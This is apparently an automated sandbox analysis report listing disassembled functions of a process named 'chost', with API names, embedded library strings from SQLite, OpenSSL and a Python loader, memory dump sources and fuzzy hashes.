7ff69437bce5-7ff69437bcf5 2140->2150 2141->2138 2142->2129 2144->2138 2152 7ff69437bde5-7ff69437bdf0 2144->2152 2146->2142 2147->2144 2150->2104 2157 7ff69437be17-7ff69437be1f 2152->2157 2158 7ff69437bdf2-7ff69437be0b call 7ff69437b6e4 2152->2158 2161 7ff69437be9b-7ff69437bea8 call 7ff69437b524 2157->2161 2162 7ff69437be21-7ff69437be33 2157->2162 2165 7ff69437be10-7ff69437be12 2158->2165 2161->2165 2166 7ff69437be35 2162->2166 2167 7ff69437be8e-7ff69437be96 2162->2167 2165->2138 2169 7ff69437be3a-7ff69437be41 2166->2169 2167->2138 2170 7ff69437be7d-7ff69437be88 2169->2170 2171 7ff69437be43-7ff69437be47 2169->2171 2170->2167 2172 7ff69437be49-7ff69437be50 2171->2172 2173 7ff69437be63 2171->2173 2172->2173 2174 7ff69437be52-7ff69437be56 2172->2174 2175 7ff69437be69-7ff69437be79 2173->2175 2174->2173 2176 7ff69437be58-7ff69437be61 2174->2176 2175->2169 2177 7ff69437be7b 2175->2177 2176->2175 2177->2167
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                        • Instruction ID: f35ae2f852899ba6825a8f000d08fe4bf3190da51a1e29e64bd24893fb08b0eb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7C1C232A0C686C1E7709B3794802BD7A64EB81B98F55C1B9EA8E877D1CE7CE445C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • 00007FFE0E142010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDF70CD1A0), ref: 00007FFDF708911D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                                        • API String ID: 2636501453-3538577999
                                                                                                                                                                                                                                        • Opcode ID: 0979272ae855488fba6a7c87807590ee704d0abdd9122f51f40eb162d6c7cb87
                                                                                                                                                                                                                                        • Instruction ID: c1ad7c1ede0b675913503e2f584f19c7ed1bc05efb9b0ad604708b1b86c46432
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0979272ae855488fba6a7c87807590ee704d0abdd9122f51f40eb162d6c7cb87
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6051E22AF2D65289FB14AB159430AF863A2AF44B95F488135DE7DC73CDDE3CE446A300
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                        • Opcode ID: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
                                                                                                                                                                                                                                        • Instruction ID: 62e54395bb7fd12c43ef6a8c36fccbdd252edc5485441615264bfcb35107bb73
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8418531A1CA8791EA31DB32E4A62E97321FF54384F90817AEA5DC3695EF3CE615C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                        • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                        • Opcode ID: 5eded3118f2e83f16c663ba3d7be67e2848f18afe53fd57a268d64a342be5141
                                                                                                                                                                                                                                        • Instruction ID: c7a9d3823c8bffd379cc0bedad63a951b13ad9b283d9fef523964680ab9943fb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5eded3118f2e83f16c663ba3d7be67e2848f18afe53fd57a268d64a342be5141
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC02802AF4964286FB548B25E871EF963A0FF84B44F045235DE6E826ECDF3CE4589704
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010$FileRead
                                                                                                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                        • API String ID: 1078952511-1843600136
                                                                                                                                                                                                                                        • Opcode ID: 2d071f0ec14e9f2342e488c5eceac2ac141867fbcd48d604d31c43613abbfcf6
                                                                                                                                                                                                                                        • Instruction ID: 6491623289099af55104cdb2f99ec47aae7b6436beacafd4d671dc39ece436ba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d071f0ec14e9f2342e488c5eceac2ac141867fbcd48d604d31c43613abbfcf6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4741EF3AB08A0282E7109F29A8909E97761FF44780F495137EA6D837ECDF3CE44A9340
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                        • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                        • Instruction ID: 8dc9b4cff8c900db3984dc338a7f4f5afe5aceefb2a42efb15c58efbdadee18a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E51C172F08112CAEB38DB7699D16BC27A1FB40358F50827DDE5ED2AE5DF38A402C600
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                        • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                        • Instruction ID: 00bf2e322935d1a5631d8eb15c954c4414da0139d4d9ff2793e7f56c777559d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78513C32E08642CAFB28DF7294903BD23A1EB49B58F148579DE8D97A89DF38D441C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                        • Opcode ID: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
                                                                                                                                                                                                                                        • Instruction ID: 1215b2d575163631c1e5e14db798a04ecb381d9b9d5665166299f9f957a8589e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35419232D1C782C3E2689B3295903696360FB947A4F10D379EA9C83ED6DF6CA4E0C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
                                                                                                                                                                                                                                        • API String ID: 1452528299-4226281315
                                                                                                                                                                                                                                        • Opcode ID: f4b4061f66c18b7e1b70434eac6376b5ebf9f95154ff5b2a55139acb83583cca
                                                                                                                                                                                                                                        • Instruction ID: bdbcfbfb8b46dc4aeab70e65ba4d63a209078c5b876e37e4de55ee45004bf72b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4b4061f66c18b7e1b70434eac6376b5ebf9f95154ff5b2a55139acb83583cca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DA16761B48A8682FB50AB35D860BBD3298EB45B88F548135DD2D0BFDEDF3CE8458700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                                        • API String ID: 1452528299-1722249466
                                                                                                                                                                                                                                        • Opcode ID: 92643a61a3c9fa44a3f46db5033dc0e5150ed97790e6335ebb9b51b1eac166c5
                                                                                                                                                                                                                                        • Instruction ID: 21397b1e2381b57f12c5db30a5047d8d5b245c677101c303704786cf605968ee
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92643a61a3c9fa44a3f46db5033dc0e5150ed97790e6335ebb9b51b1eac166c5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2A14F61B0C64281FB64AA35D861BB9729CEF81B48F744131D93D47EDECE3CE8828751
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
                                                                                                                                                                                                                                        • API String ID: 1452528299-1219543453
                                                                                                                                                                                                                                        • Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                        • Instruction ID: 4fd7fb0cb2af8d77d2e9cbaf75f2424db64344125d081779c5298db51749b019
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB41AC62B09A8282EB549B25D864BBD73A8FF80B84F148175DA6D07FDEDF3DE4518300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                        • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                        • Instruction ID: 854a63cb4f7dda085c4bfc935009b4dd2d234d1d3f13c8418eb7930821cafe21
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B310320E0C24391FA74AB7794A33B93691EF46384F44C4BDEA4ECB2D7DE2EA405C650
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                        • Instruction ID: 77da75c9d5c2532d6642757488da921f8e489b15e222c87b49855b6ecbea1396
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38519372B0D641D6FA749A77948067E62A1EB44BA8F14C778EEFD867C5CE3CE441C600
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2976181284-0
